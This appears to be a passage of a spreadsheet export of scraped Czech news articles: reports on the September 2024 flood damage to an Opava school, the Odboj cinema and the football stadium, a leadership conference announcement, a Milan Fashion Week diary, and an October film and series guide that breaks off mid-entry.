podaří najít nějaký odolnější povrch, který by „třeba dvacetiletou vodu zvládl“. „Musí to být priorita, protože se blíží nehezké počasí a my musíme učit tělocvik,“ říká ředitel. Půjčení tělocvičen podle něj sice nabízejí okolní školy, dojíždění by se ale nezvládlo jednak kvůli rozvrhu a jednak kvůli tomu, že by pro školu bylo příliš drahé. Proto je Hromada odhodlaný situaci vyřešit co nejrychleji a věří tomu, že v prosinci by škola mohla mít novou tělocvičnu. K tomu bude potřeba zrekonstruovat dílny, zahradu i třídy – tři z nich mimochodem opravovali o prázdninách kvůli tomu, že v patře nad nimi praskla hadička u umyvadla a vytopila je. „Člověk si to nesmí brát osobně, takže dokud jsou síly... Něco jsme vybudovali a budeme to budovat znova,“ je odhodlaný šéf školy. Je rád alespoň za to, že s kolegy dostali před povodní včasné varování a věci – alespoň ty, co nebyly přišroubované – zvládli vynést do vyšších pater, a rozhodně nelituje svého rozhodnutí vést školu, která je dnes trochu v troskách. Je prý vděčný za to, jak se k celé věci postavili její zaměstnanci, do stěhování se zapojili i starší učitelé. Ředitel děkuje i za pomoc, již nabízejí lidé i instituce (například další školy) z celého Česka. „Reagují na videa, která jsme dávali na Facebook. Třeba tady na tom je vidět, kolik tu bylo bahna,“ scrolluje na sociální síti a zastaví se u příspěvku, na kterém je černobílý kocour, jehož prý společně s dalšími učiteli pomáhali hledat. Patří do nedalekého místního kina Odboj. Stále jako po boji. (Intenzivní odklízecí práce na opavském sídlišti Kateřinky pořád probíhají) Autor: Milan Jaroš Odboj nikdy nezavírá „První, co potřebuju, je plynař. Musíme spustit alespoň jeden kotel a začít vytápět a vysoušet budovu,“ říká provozovatel a majitel kina Odboj Richard Vacula, který bydlí se svou přítelkyní, dvouměsíční dcerou a nalezeným kocourem jménem Opi v bytě nad kinem. Kino postavené v roce 1913 stojí jen pár stovek metrů od knihovny. Pětatřicetiletý absolvent katedry zvuku FAMU jej znovu pro jeho původní účely otevřel před třemi lety. Kino fungovalo i jako hudební klub. Když měl pocit, že ustál výzvu, kterou pro kinaře a kluby představoval covid, přišla voda. Kotelna umístěná za pódiem byla zaplavená celá. V sále voda sahala do dvou metrů – na otlučených zdech je vidět linka, kde se zastavila. Pod vodou byla i zahrada s letním kinem. Vacula původně doufal, že se vodu podaří třemi čerpadly odčerpávat tak, aby škody byly minimální. Už ve středu koupil tři čerpadla a hadice – údajně k velkému překvapení prodavače. Pěnou vystříkal dveře, aby valící se živel nepronikl dovnitř. Plán s čerpadly ale nakonec nestačil na druhou nečekanou vlnu po protržení přehrady. Na odpis je zvuková aparatura, mobilní 16mm promítačky, dva klavíry nebo náhradní díly pro historické projektory, které se už dávno nevyrábějí. Co se ze součástek podařilo zachránit, je vyskládané v krabicích za sedadly na balkoně. Během čekání na vodu právě na balkon vynosili, co mohli. Včetně kovových krabic s 16mm filmy, které teď lemují průchod z foyer na balkon. Na sedačkách tu leží hromady křupek a brambůrků vynesených z baru. Některé plovoucí lahve alkoholu nechal Vacula dvěma stovkám dobrovolníků, kteří mu přišli po opadnutí vody pomoci. Pomáhat přišli i hospodští z „jiného světa“, jak říká nezatopené části Opavy nad řekou, kterým dával volňásky do kina výměnou za vyvěšení programu. Voda přinesla i příležitost – třeba zbavit kino nánosů diskotéky z devadesátých let a zrekonstruovat ho do podoby z roku 1913. (Richard Vacula v kině Odboj, kde voda zničila pódium i vzácné promítačky) Autor: Milan Jaroš Nazmar přišla i nemalá část sbírky filmových plakátů. „Několik stovek jich leží v mrazáku, aby se nerozpadly. Postupně je zkusíme restaurovat,“ říká kinař. Zachráněné filmy jsou aktuálně vyskládané v jedné z výrobních hal opavské firmy na obrábění železa, která se sama nabídla. Pomoc po povodni přišla bezprostředně i z Diakonie Českobratrské církve evangelické – zapůjčila vysoušeč. Město dodalo dezinfekční prostředky nebo pití pro brigádníky. Den po novinářské návštěvě Vacula pošle zprávu, že mu distribuční společnost Cinemart odpustila poplatky za film Konec světa. Pražské kino Vzlet podle jeho informací chystá koncert na podporu Odboje. Dobrovolníci několik dní demontovali, vynášeli, vytírali, omývali a osekávali. A znovu a znovu vytírali. „Po dvou dnech už mi hlava nefungovala. Bylo celkem obtížné koordinovat a delegovat, protože ne každý věděl, co má dělat, a ne každý umí všechno,“ vypráví viditelně unavený Vacula. Na dva dny pak vyhlásil úklidové volno, aby se stihl dospat a komunikovat s elektrikáři, plynaři nebo pojišťovnou. Byť je kino celkově pojištěno na 19 milionů, může dostat maximálně dva. Na víc ho v záplavové oblasti proti povodni pojišťovna nepojistila. Na sbírce na platformě Donio , kterou pro něj spustil jeden z jeho příznivců, hudebník Ondřej Fencl , se mezitím už vybrala cílová částka 350 tisíc. Peníze dál přibývají. „Už víme, že na základní zvukový aparát máme,“ komentoval částku na Facebooku Vacula. Promítat nepřestaneme. (Na programu je snímek Amerikánka s diváky na balkoně, který zůstal ušetřený) Autor: Milan Jaroš Všechny opravy se budou dělat za provozu. Zavřít nikdo neplánuje. Další projekci – snímek Viktora Tauše Amerikánka – mají naplánovanou už za čtyři dny, na nadcházející pátek. Diváci budou sedět na balkoně, kam voda nedosáhla. Po dvoudenní pauze se tak rozjede další vlna úklidu, aby bylo kino připravené na filmovou delegaci v čele s režisérem Viktorem Taušem a herečkou Pavlou Beretovou . V podobném provizoriu se nejspíš pojede dlouho – a nikdo neví jak dlouho. Odhaduje, že plně zrekonstruované by kino mohlo být za dva roky. Provádění prostory kina na chvíli přeruší zástupce spolupracujícího pivovaru. Přichází zjistit, co z vybavení a zboží zatopila voda a co je třeba vyměnit či sterilizovat. Bude třeba vyčistit trubky chlazení nebo objednat sudy s pivem , protože ty, které byly pod vodou, jsou z hygienických důvodů na odpis. „Budeme mít sud piva na páteční projekci Amerikánky. To je základ,“ vrací se kinař s dobrou zprávou. Za pár dní pak píše: „ Amerikánka byla, zvuk kina se podařilo propojit hodinu před projekcí.“ Plakáty ve venkovních dřevěných vitrínách shodou okolností lákají na nový film Bohdana Slámy Konec světa. Na ten to ale Richard Vacula nevidí. Voda prý přinesla i něco dobrého. Obrazně vyplavila všechny nechtěné nánosy času v interiéru: před rokem 1989 necitlivé zásahy postupně kino zbavovaly jeho šarmu, v devadesátých letech v něm mimo jiné sídlila diskotéka Alhambra , po které zůstal třeba fialový nátěr stěn a dobové zářivky či dlaždice. Nevkusné pódium odnesla voda a mělo by ho nahradit nové se štuky kopírujícími ty na protějším balkoně. Plánuje se nové dřevěné obložení. Nejdůležitější bude sehnat řemeslníky schopné vyrobit historické repliky vnitřního vybavení kina podle fotek, které má k dispozici. „Beru to jako šanci zrekonstruovat kino od základů do jeho původní podoby,“ dodává. Všichni ruku k dílu! (Do uklízení vytopeného stadionu SFC Opava se zapojil, kdo mohl) Autor: Milan Jaroš Kam na Baník ? Jeden z trenérů týmu druholigového fotbalového SFC Opava David Baier by se za normálních okolností s týmem chystal na další zápas fotbalového podzimu. Připravovali by taktiku na soupeře v ligovém poháru. V pondělí odpoledne ale místo toho obchází hřiště a přemýšlí, jak dát do pořádku to, co tady napáchala povodeň. Hbitě přeskakuje branku, protože kvůli bahnu nejde otevřít, a začíná vyprávět, jaká je v klubu dnes situace. „Je to jako po výbuchu. Naštěstí to v tom počasí – jak svítí sluníčko – hezky schne,“ říká, když dojdeme k té části městského stadionu, v níž je zázemí pro hráče a kanceláře funkcionářů. Voda kompletně zaplavila přízemí. Díky zaměstnancům klubu i dobrovolníkům se už podařilo odstranit většinu z nánosu bláta. Do akce se zapojili i hráči prvního týmu. „Minulý týden jsme tady byli tři dny. Trénink dopoledne, odpoledne se najelo a pracovali jsme do večera,“ popisuje s tím, že společně udělali, co se dalo, teď už ale „musí hrát a rekonstrukci stadionu převezmou profíci“. Jak tvrdě tu voda zaútočila, je vidět už u hlavního vstupu – jedno křídlo dveří živel zlomil. Podle mluvčího klubu Jakuba Berana čekali, že se tady řeka Opava „vyleje maximálně o dvacet až třicet čísel“. „Oproti Kateřinkám je tady břeh asi o dva metry výš. Nakonec ale přiteklo ještě o půl metru vody víc než při povodních v roce 1997,“ srovnává a ukazuje na zdi, kam až voda sahala. Mluví o tom, že se klub na povodeň intenzivně připravoval. „Všechny cenné věci včetně oblečení nebo laserových hlavic na regeneraci jsme zvedali do metru a půl. Není ale reálné vynést vše do vyšších pater. Voda měla takovou sílu, že stoly, lavice a skříňky, na kterých to stálo, zdemolovala a vše smetla.“ Z místností – press centra, trenérských kabin a dalších – zmizel veškerý nábytek, většina z něj se musela vyhodit. Vidíme holé zdi, někde už bez omítky. Zbořit museli i klubovou saunu. Postupně uklízet a likvidovat. (Pohled ze zázemí opavského fotbalového stadionu na hrací plochu) Autor: Milan Jaroš Největší škody – alespoň co se týká vnitřku – záplavy podle Berana způsobily ve dvou kotelnách. Jedna slouží k vyhřívání budovy, druhá k vyhřívání trávníku a jsou ještě o několik centimetrů níž než okolí. Podle obrysu, který nechala na stěnách, tu voda sahala tak do výšky 180 centimetrů. Z prvního laického pohledu to – možná i kvůli slabému světlu baterky v mobilu – vypadá, že jsou kotelny v pořádku. To se ale jenom zdá. „Všechny kotle se musí vymlátit a vyhodit. Všechny rozvody, všechny trubky. Bylo to tady komplet zaplavené,“ ukazuje mluvčí postupně obě místnosti s tím, že by rád řekl, jak to je, ale „nechce být sprostý“. Zbytek vyhřívání hřiště, které se tady začalo budovat teprve před šesti lety, je naštěstí v pořádku. Neplatí to však o samotném trávníku. I na něm byl (a částečně pořád zůstává) nános bahna a už teď je jisté, že se zelený pažit kvůli kontaminaci musí vyměnit. Jen se zatím neví, jak hluboko do země se bude muset „hrábnout“. „Už teď víme, že sedm centimetrů budeme muset odřezat. Dělá se rozbor, jestli jsou tam nějaké patogeny, chemikálie a další věci, jak voda přišla od Krnova ,“ přibližuje technický šéf klubu Roman Kovář a vyjmenovává, co bude potřeba udělat nejdřív: sundat omítky, vysušit zdivo, opravit elektřinu, odstranit další bahno za stadionem a postupně všechno čistit a likvidovat. S diváky nejdřív na jaře. (Zástupci klubu doufají, že na jaře už si zahrají tady – na opavském městském stadionu) Autor: Milan Jaroš Přestože klub vlastní slovenská firma A.I.K. , stadion a celé zázemí patří Opavě . Stejně jako v případě sportovního areálu u Základní školy Šrámkova by tak měla škody zaplatit městská pojistka. Jen částka bude mnohem vyšší. Zástupci klubu odhadují, že půjde (hrubým odhadem) o 70 milionů korun. Místní doufají, že si první jarní kolo soutěže zahrají v březnu už na svém. „To je společný cíl nás všech. Uděláme pro to maximum,“ shodují se. Domácí utkání budou zatím hrát v nedalekém Hlučíně . Pořád se ale řeší, kde odehrají slezské derby s rezervou ostravského Baníku , které je v plánu na 25. října. Hlučín odmítl a do pořádání zápasu dvou týmů s divokými a historicky znepřátelenými fanoušky se zatím nikdo nehrne. Pokud jste v článku našli chybu, napište nám prosím na [email protected]. Mohlo by vás zajímat Tomáš Brolík, 8. 10. 2024 Aktuální vydání Autor: Jindřiška Bláhová, Martin Štorkán Autoři person Jindřiška Bláhová person Martin Štorkán Rubrika transition_slide Kontext, Povodeň, Škody, Opravy, Severní Morava</t>
  </si>
  <si>
    <t>26570</t>
  </si>
  <si>
    <t>25320</t>
  </si>
  <si>
    <t>20241001_86_2995917381_6a7315945e89e62fbd47.html</t>
  </si>
  <si>
    <t>6a7315945e89e62fbd47</t>
  </si>
  <si>
    <t>Pražský hrad přivítá konferenci o krizi společnosti</t>
  </si>
  <si>
    <t>Pražský hrad přivítá konferenci o krizi společnosti Leadership, do češtiny překládaný jako tvůrčí vedení, nezažívá právě ty nejlepší časy, a ve světě se dostává do slepé uličky. Vůdčí osobnosti nejsou pravými státníky a ve svých rolích selhávají – upřednostňují vlastní výhody před prospěchem společnosti. Společnost ale bohužel není schopná na mocenské a ekonomické zájmy těch, kteří ji mají vést, konstruktivně reagovat. Na možném řešením nenachází shodu, místo toho se polarizuje a radikalizuje. Kromě krize vedení a absence elit tak můžeme pozorovat stoupající počet ozbrojených konfliktů, ekonomické a klimatické problémy. Aby toho nebylo málo, o slovo se hlásí nastupující generace. Nese označení Generace Z a více než kterákoliv z předešlých se orientuje na ekologii. Ze společnosti se vytrácí empatie, a spory se najednou zdají být nepřekonatelné. Navíc vznikají úplně na všech úrovních – mezi státy, uvnitř rodin, v hospodě u piva , mezi přáteli. Přitom dohodnout se neznamená s jiným postojem nutně souhlasit, ale porozumět mu. Porozumět druhému člověku s odlišným názorem, pochopit, proč takový názor zastává, a respektovat jej. To je základ leadershipu budoucnosti. Empatie, schopnost naslouchat, vnímat ostatní jako sobě rovné. A právě o tom, jak se současnou nelehkou situací naložit, bude konference Lídři budoucnosti na Pražském hradě 8. října 2024. Pořádá ji Podnikatelský klub Empiria 21 spolu s Asociací vyjednavačů, jejíž prezident Radim Pařík do Lobkowiczkého paláce pozval osobnosti světového leadershipu. Mezi nimi nebude chybět špičkový vyjednavač Chris Voss, který v americké FBI vedl skupinu specializující se na mezinárodní vyjednávání s únosci a teroristy, Pavla Gomba , výkonná ředitelka UNICEF ČR, nebo prezident Hospodářské komory ČR Zdeněk Zajíček. Tématem budou nejen konflikty ve vedení států i firem či ekonomická a klimatická krize, ale také již zmíněná generační obměna. „Jaká je budoucnost leadershipu a jak být dobrým leaderem? Aktuálně světový leadership prochází krizí, a důsledkem je, že vyostřené konflikty nejen hrozí, ale rovnou propukají. Společnost nenachází shodu nad možným řešením, a výrazně se polarizuje i za cenu nedozírných následků. Ukazuje se propast mezi mocí a kompetencí,“ říká Radim Pařík, prezident Asociace vyjednavačů a dodává: „Dobrý leader budoucnosti nadřazuje společenské hodnoty vlastnímu prospěchu. Naslouchá, ale nezaměňuje empatii se soucitem. A konsenzu nedosahuje nátlakem. Vzpomeňme historické chyby politiků, které vedly ke zničujícím konfliktům, ale také třeba současnou taktiku, jakou své cíle prosazuje generace Z.“ Radim Pařík je jedním z významných spoluautorů bestselleru Chrise Vosse Empathetic Leadership, knihy o cestě mezi krizemi a konflikty, ve které Voss čerpal ze své praxe v americké FBI . Část Jak vyhrát u jednacího stolu, jejímž autorem Pařík je, se věnuje strategiím na podporu empatie a efektivního vyjednávání. Radim Pařík je dále autorem knihy Umění vyjednat cokoliv a jediným českým zástupcem v prestižním Negotiation Clubu. Konferenci na Pražském hradě zakončí ukázkovým tréninkem empatického vedení lidí. Autor: external Rubrika transition_slide Zprávy &amp;gt; Společnost</t>
  </si>
  <si>
    <t>12270</t>
  </si>
  <si>
    <t>9790</t>
  </si>
  <si>
    <t>20241001_88_2995868865_e2c31f3ebf1d67fc6f00.html</t>
  </si>
  <si>
    <t>e2c31f3ebf1d67fc6f00</t>
  </si>
  <si>
    <t>Zápisník šéfredaktorky: Milánský týden módy</t>
  </si>
  <si>
    <t>Zápisník šéfredaktorky: Milánský týden módy Milánský fashion week má pro mě jinou atmosféru než přehlídky a prezentace v jiných metropolích. Přehlídky tu nepřistávají jak z vesmíru do ulic rušného města a místní tu ani na okamžik nedávají najevo, že by se jich móda netýkala, nebo že by jim rojící se davy před vstupy na přehlídky snad vadily. Úroveň stylu v šatnících Milánců a Milánek je zkrátka za všech okolností mnohem vyšší než ve zbytku Evropy a nedávný trend tichého luxusu tu žádným trendem není, protože důraz na kvalitu materiálu, jeho zpracování i jemný, ale sofistikovaný design tu byl vždy, v Milánu ho člověk přijímá v mateřském mléce. Jedno deštivé odpoledne 18. září v MIláně se přímo v ústředí značky konalo představení kolekce jaro/léto 2025 Brunella Cucinelliho . Je to pokaždé akce, která se vymyká zbytku fashion weeku a všichni se na ni náležitě nachystají. Letošní prezentace nesla titul “Ozvěny z cest”, který narážel na na povahu oděvů, doplňků i kabelek, jejichž barevnost i materiály se hodí na cesty do měst, do přírody, na Riviéru i na poušť, jak prezentace zdůrazňovala. Milano fashion week: trocha Jackie, trocha Madonny a hodně minulosti Na celé odpoledne se tedy brána do světa Brunella Cucinelliho a jeho rodiny otevřela všem pozvaným. Vítal nás sám Brunello Cucinelli , vřele se s každým objal, vzpomněl si, že jsem s ním před časem v jeho rodné vesničce, nyní impériu uprostřed vinic, dělala rozhovor, a povyprávěl mi, že vedle vinařství, monumentu a rozvíjení manufaktury v Solomeu teď také buduje knihovnu. Nikoliv pro sebe, ale pro lidstvo, proto tam hodlá pořídit veškeré vzácnosti, ke kterým se dostane. “Člověk musí umět žít, jako by to měl být jeho poslední den, ale plánovat, jako by měl žít věčně,” říká a usmívá se, zatímco na fotku s ním stojí fronta. Brunello Cucinelli má v mém srdci zvláštní místo. Je to zakladatel v nejlepším smyslu slova posedlý svou misí, kterou je kultivovat vše, co může. Ostatně, zajděte si do pražského butiku Brunella Cucinelliho , jsou tam také knihy, na nichž pan Cucinelli trval, aby i uprostřed delikátního desingu člověk nezapomínal, že musí zdobit i svou mysl. Casa Cucinelli na Viale Montello 16 je v tu chvíli naplněná lidmi k prasknutí, po celém labyrintu sálů plných polic s knihami, sochami a květinami je rozeseta nová kolekce, mezi lidmi se procházejí modelky oděné do toho nejlepšího, co krejčové a pletařky ze Solomea stvořily. V hlavní roli je vlna, kašmír, hedvábí, bavlna a len, ručně upravené tkaním, pletením a technikou macramé, vše jemně prozdobeno flitry, které jsou pro Cucinelliho typické. Kromě obvyklých přírodních barev se tu objevuje tlumená červená a modrá. Kalhotové kostýmy, saka a šaty doplňují klobouky, šátky a brýle. Samostatným tématem tu jsou sofistikovaně konstruované kabelky, měkké a ladně přiléhající k tělu bez ohledu na jejich velikost. Ač se tu podávalo šampaňské a tedy fantastické těstoviny s omáčkou z rajčat a ricotty, celým prostorem se vznáší vůně parfémů. Vedle stálé kolekce mě zaujaly parfémy nové, z nich především Vento Ardente, “spalující vítr”, vůně, která evokovala dálky, pouště, pomalou chůzi přírodou a klid. Říká se, že vůně je nejlepší zápis vzpomínky do paměti, a tak mi z kabátu stále voní Vento Ardente a vyvolává vzpomínku na jednu z nejkrásnějších prezentací celkového životního stylu, jakou Miláno a možná celý módní svět může nabídnout. 3 / 12 Přejít do galerie Na milánské přehlídce Max Mara 19. září chce být každý, nepřeháním. V jasném, bílém, velmi úsporném prostoru, který nemá pozorovatele ani na chvilku rozptylovat, trvalo nekonečně dlouho, než se celý excitovaný dav usadil a přehlídka se velice vydařila. Max Mara měla tentokrát jasné zadání. Kolekce na jaro/léto 2025 je inspirovaná postavou Hypatie, charismatické a nesmírně talentované matematičky a filosofky, která žila ve 4. století v egyptské Alexandrii , a již pro její talent a vliv jednoho dne dav rozvášněných křesťanských mužů strhl z vozu, odtáhl do chrámu a připravil o život rozdrásáním jejího těla škeblemi ústřic. Hypatia se příliš nezdobila a svou pozornost věnovala geometrii, což je dokonalý oslí můstek k povaze kolekce, která se před námi rozvinula. Za mě byla přehlídka nádherná a kolekce neskutečně povedená. Minimalistický styl, který ale v žádném případě neznamená jednoduchý či nenápaditý, se odehrával v pro Max Maru typických barvách: bílá, černá, béžová. Nejsilněji ovšem byla zastoupena barva hořké čokolády, hlavní trend konce letošního a celého příštího roku. Kabátky, kostýmy, šaty, košile, volné i přepásané, s průstřihy a řasením. Konec přehlídky zdobila Irina Shayk , na které se geometrie Max Mary vyjímala mimořádně půvabně. 3 / 13 Přejít do galerie O den později se mezi sloupy paláce Pinacoteca di Brera, který slouží výuce umění, procházejí modely kolekce Sportmax SS25. Oproti geometrické úspornosti a strohosti Max Mary kolekci Sportmaxu vévodí ženský půvab, vláčnost, jemné materiály, něžně obepínající figury modelek. Barvy jsou také pestřejší, červená, zelená a prvky žluté jsou proti pískové barvě neokasicistního nádvoří pokrytého navíc bílým kobercem hodně výrazné. Jemné poloprůhledné modely doplňují šňůry lesklých krystalů, jako by se kolem oděvů tvořila ledová krusta. Několik modelek svíralo klasickou kabelku Soffy. Neskutečně krásná Irina Shayk to tu opět rozsvítila. Vždycky si říkám, proč se zrovna u téhle linie objevuje v názvu slovo sport, protože kolekce Sportmaxu jsou za mě tou nejženštější a nejdesignovější verzí všech linií skupiny Max Mara. Potlesk byl veliký, řekla bych, že tahle kolekce oko návštěvníků potěšila, něha a smyslná šťavnatá krása dokonale ladila se sochami a celým teplým podzimním dnem. 3 / 18 Přejít do galerie Jsou přehlídky, kde se cítím jako doma, mám dojem, že by mi všechno, co se objevilo na mole, slušelo a že držím prst na tepu doby. A pak jsou přehlídky, kde se kolem mě odehrává krása takového charakteru, že si - nehledíc na množství let strávených v módě a lifestylu - někde uvnitř připadám nepatřičně a jako tetička z vesnice. Přehlídka kolekce Elisabetty Franchi ve mně vyvolává přesně ten druhý dojem, samozřejmě to myslím v tom nejlepším smyslu. Už samotné minuty, předcházející přehlídce. Nikde jinde než v Miláně jsem to nikdy nezažila, ani v Paříži na těch nejtěžkotonážnějších přehlídkách. V Miláně se začnou před přehlídkami sjíždět samotné dívky a ženy či ženy v páru a člověk by na nich mohl oči nechat. Jako by se jednalo o jiný živočišný druh. Všechny jsou o hlavu vyšší než já, přitom ještě lehkým jistým krokem přicházejí na jehlách, které popírají veškerou anatomii nohy. Hladká pokožka na všech končetinách se jim zlatě leskne, všechny mají dokonalé zuby, manikůru a kolem tváře se jim svíjejí husté lesklé lokny všech odstínů kaštanové. Mám pro tu milánskou dokonalost obrovský obdiv a respekt. A právě pro takové ženy byla přehlídka Elisabetty Franchi. Je to intenzivně italská móda, která vyžaduje dokonalost, disciplínu a obrovské sebevědomí. Přehlídka nese název The Femme Paradox. Žádné doprovodné materiály už téma silné, sebevědomé ženy nemusejí rozvádět, modely, které velmi hubené modelky na extrémně vysokých podpatcích předváděly, mluví za sebe. Kolekce je to opravdu velkolepá a styling Carine Roitfeld je tu evidentní. Je ze značky cítit energie, které pomohly nedávné investice bývalého prezidenta Gucci Marca Bizzarriho. Jakákoli umírněnost nebo snad minimalismus střední a severní Evropy tu nemá místo, modelky ostře kráčejí dopředu a smyslně se houpou v bocích. “Žena, pro kterou tvořím, je silná a nikdy se nevzdá,” nechala se slyšet Elisabetta Franchi těsně před přehlídkou. Víceméně černobílá kolekce je plná korzetů, pásků, chokerů, vším prosvítá spodní prádlo kontrastní barvy, pracuje se tu s tylem, řaseným hedvábím, punčoškami a s flitry, a jako zlatý hřebík přicházejí svatební šaty. I ty jsou sexy a drzé jako vše, co jim předcházelo. Potlesk do až ohlušující hudby byl fenomenální, protože publikum složené z vlivných italských žen svou Elisabettu prostě miluje. 3 / 26 Přejít do galerie V centru Milána v sálech renesančního paláce vystavila italská značka obuvi a doplňků Aquazzura své kousky poslední kolekce. Aquazzura je radostný brand plný vtipných detailů na svých produktech a dokazují to i boty, střevíce na vysokých podpatcích, balerinky a sandálky, které se tu na obrovských stolech rozkládají. Přítomný je tu i umělecký ředitel značky Edgardo Osorio. Vše tu připomíná moře. Na jemných sandálkách se vyjímají drobní živočichové z rafíje, mušle, hvězdice, mořské řasy. Osorio se prý tentokrát inspiroval mořským pobřežím v Mexiku , kde trávil dovolenou. Mexiko mají také připomínat krajky a macramé, kterým jsou zdobené především balerinky. Ploché sandále jsou zase zdobené korálky a šňůrkami, kterými se bota poutá ke kotníku. Zobrazit příspěvek na Instagramu Příspěvek sdílený Harper's BAZAAR Czech Republic (@harpersbazaarcz) Původem z Kolumbie , Edgardo Osorio založil značku Aquazzura před třinácti lety ve Florencii , kde žije. Nechtěl vytvářet žádné sofistikované boty na hranici umění, Aquazzura je opravdu brand, který má v člověku vyvolat lehkomyslný pocit prázdnin, dovolené, nekonečného letního večera, a to přesto, že se v kolekci nacházejí i kozačky do zimního počasí. Ovšem takového, kde i v zimě svítí slunce a nesněží. Většinou jde nicméně o sandálky s divoce vysokými podpatky, na kterých se prý ale podle svědků chodí docela pohodlně. Zastavujeme se u střevíce, který se kolekci vymyká. Jde o zachycení mořské vlny a Edgardo Osorio je na ni pyšný, bota spíše připomíná sochu. Mě, která se podpatkům vyšším než osm centimetrů vyhýbá, zaujaly vlastně tentokrát spíše kabelky. Kožené, kovové, třpytivé… Mým absolutním favoritem je psaníčko tvaru čínského koláčku štěstí. Brunella Cucinelliho Max Mara Sportmax Aquazzura Max Mara ss25 Kolekce Sportmax SS2025 Kolekce Elisabetta Franchi SS2025</t>
  </si>
  <si>
    <t>1640</t>
  </si>
  <si>
    <t>2490</t>
  </si>
  <si>
    <t>20241001_89_2995851487_e4dd60f5939d549f6260.html</t>
  </si>
  <si>
    <t>e4dd60f5939d549f6260</t>
  </si>
  <si>
    <t>Filmové a seriálové tituly října, které byste si neměli nechat ujít - NerdFix</t>
  </si>
  <si>
    <t>Filmové a seriálové tituly října, které byste si neměli nechat ujít - NerdFix Máme zde začátek října. A víte, co to znamená? Přesně tak, je zde další Kalendář nerda , jenž vám představí ty nejslibněji vyhlížející tituly měsíce, které byste si určitě neměli nechat ujít. Tentokrát toho máme hodně. Jakože FAKT hodně. Podíváme se na jistého klauna ve věznici města Gotham, vydáme se na nové dobrodružství se slavnou herní archeoložkou, staneme se svědky efektu zázračné substance, po které se ženy “znovuzrodí”, a v neposlední řadě, zahrajeme si skutečné Městečko Palermo s vlkodlaky a v neposlední řadě si konečně posvítíme na vysněný a již rozporuplně přijímaný sci-fi projekt od Francise Forda Coppoly . Které další zajímavé filmy a seriály října se k nám ještě ženou? Na to se hned teď půjdeme podívat. 2. ŘÍJNA Kde je Wanda? - Apple TV+ A začneme titulem, který pochází z německých končín. Na službě Apple TV+ si budete moci pustit novou sérii jménem Kde je Wanda? Chystaná černá komedie bude vyprávět příběh Deda a Carlotty Klattových, manželského páru, jenž se zoufale snaží najít svou pohřešovanou 17letou dceru Wandu, která před měsíci beze stopy zmizela. Když se ji policii nepodaří najít, manželé vezme věci do svých rukou a pořídí si sledovací zařízení s pomocí svého technicky zdatného syna Oleho. V přestrojení za zaměstnance elektrárenské společnosti odposlouchávají svou čtvrť a poté i polovinu předměstí. Následně ale zjistí, že žádný z jejich sousedů není za zavřenými dveřmi tím, za koho se vydávají. Na službě Apple TV+ od 2. října. 3. ŘÍJNA Joker: Folie à Deux - Kino Už brzy se budeme moci vydat zpět do ponurého Gothamu, kde přebývá Arthur Fleck alias Joker. Pokračování miliardového DC titulu o slavném klaunském princi, které se chlubí podtitulem Folie à Deux , už je skoro zde. Opět se tak podíváme do Arkhamu, gothamského vězení a blázince, kde Arthur Fleck po událostech předchozího filmu zůstal. Smutno mu tam ale dlouho nebude, seznámí se zde se svou slavnou spřízněnou duší, kterou je samozřejmě Harley Quinn . A jak už dlouho víme, snímek bude obsahovat i několik muzikálových čísel, jak to ale bude fungovat, se necháme překvapit. Dále se zdá, že Arthura bude podporovat mnoho příznivců zvenčí, ovšem těžko říct, co všechno se vlastně bude ve filmu odehrávat pouze v jeho hlavě. Snímek měl na filmovém festivalu v Benátkách poněkud rozporuplné reakce, ale nutno připomenout, že ani první díl mnohým kritikům a novinářům příliš nevoněl. V kinech od 3. října. Prokletí Salemu - Max Jednu dobu to vypadalo s hororovým snímkem Prokletí Salemu, další filmovou adaptací románu od Stephena Kinga , poměrně nahnutě, ale nakonec se ho přece jenom dočkáme. A to již brzy. Hlavním hrdinou příběhu se stává spisovatel Ben Mears, který se vrací do města Jerusalem 's Lot v Maine , v němž prožil část svého dětství, aby zde mohl najít inspiraci pro svou další knihu. Zde se také zakouká do přitažlivé Susan, ovšem na nějaké poklidné psaní může rovnou zapomenout. Richard Starker, který do města přijel spolu s Benem, se usídlí v rezidenci za městem, kde přebývá jeho prastarý upíří pán. A následně se z města začnou postupně ztrácet lidi. Ben a Susan proto budou muset spojit síly s dalšími obyvateli, mezi které například patří doktorka Cody, studentík Mark Petrie a s vlastní vírou zápolící Otec Callahan, aby strašlivé zlo zastavili. Na službě Max od 3. října. Legenda jménem Vox Machina: 3. řada - Prime Video Legenda jménem Vox Machina se známými hlasy ze skupiny Critical Role se vrací ve třetí sérii. A rozhodně se můžeme těšit na napínavý příběh. Ten bude pokračovat v boji proti Chroma Conclave, kdy hrdinové budou muset čelit vůdci těchto děsivých draků. Tím není nikdo jiný než Thordak zvaný Cinder king. Kromě toho se děj bude zaměřovat i na hlubší vztahy mezi členy Vox machina a dočkáme se i romance mezi Keyleth a Vaxem. Tvůrci navíc lákají na srdcervoucí zvraty a mnoho akce. Na Netflixu od 3. října. Jiný člověk - Kino Sebastian Stan , představitel Buckyho Barnese alias Winter Soldiera z MCU, si zahraje v novém filmu studia A24 jménem Jiný člověk. Ztvární zde začínajícího herce jménem Edward, který ze všeho nejvíce na světě touží po novém a šťastném životě. Následně podstoupí radikální lékařský zákrok, díky němuž se zbaví svého znetvořeného vzhledu. Štěstí a radost se ale nedostaví, následně totiž ztratí svou roli, pro níž se narodil. Edwardovo vnímání sebe sama se tak začne měnit poté, co začne hledět na svou starou identitu očima muže, který ho hraje na jevišti. Snímek každopádně zabodoval na letošním Berlinale, kde Sebastian Stan získal Stříbrného medvěda za nejlepší herecký výkon. V kinech od 3. října. 4. ŘÍJNA Díra 2 - Netflix Veleúspěšný španělský thriller Díra, který byl jistou nelichotivou alegorií na lidskou společnost, dostane tento měsíc na Netflixu. Původní film, který se na Netflixu stal vůbec nejsledovanějším španělským snímkem, nás zavedl do prazvláštního vězení, v němž jsou jednotlivé cely vyskládané věžovitě na sobě. Cely propojuje velká díra uprostřed, přes kterou začne po nějakém čase z nejvyšších pater sestupovat stůl s jídlem. V každé z cel se na nějakou chvíli stůl zastaví, aby se mohli vězni najíst, následně pak pokračuje dolů do nejnižších cel. Vězni, kteří obývají nejvyšší cely, mohou tudíž královsky hodovat, ovšem na nešťastníky z nejnižších cel čekají pouhé zbytky. V druhém díle převezme nad celou věznicí vládu tajemné individuum, které zde zavede nový zákon a kontroverzní metodu. Do celého konfliktu je tak zatažena nová vězeňkyně. Pokud ale jedení ze špatného talíře znamená rozsudek smrti, jak daleko byste byli ochotni zajít, abyste si zachránili život? Na Netflixu od 4. října. 10. ŘÍJNA Tomb Raider: The Legend of Lara Croft - 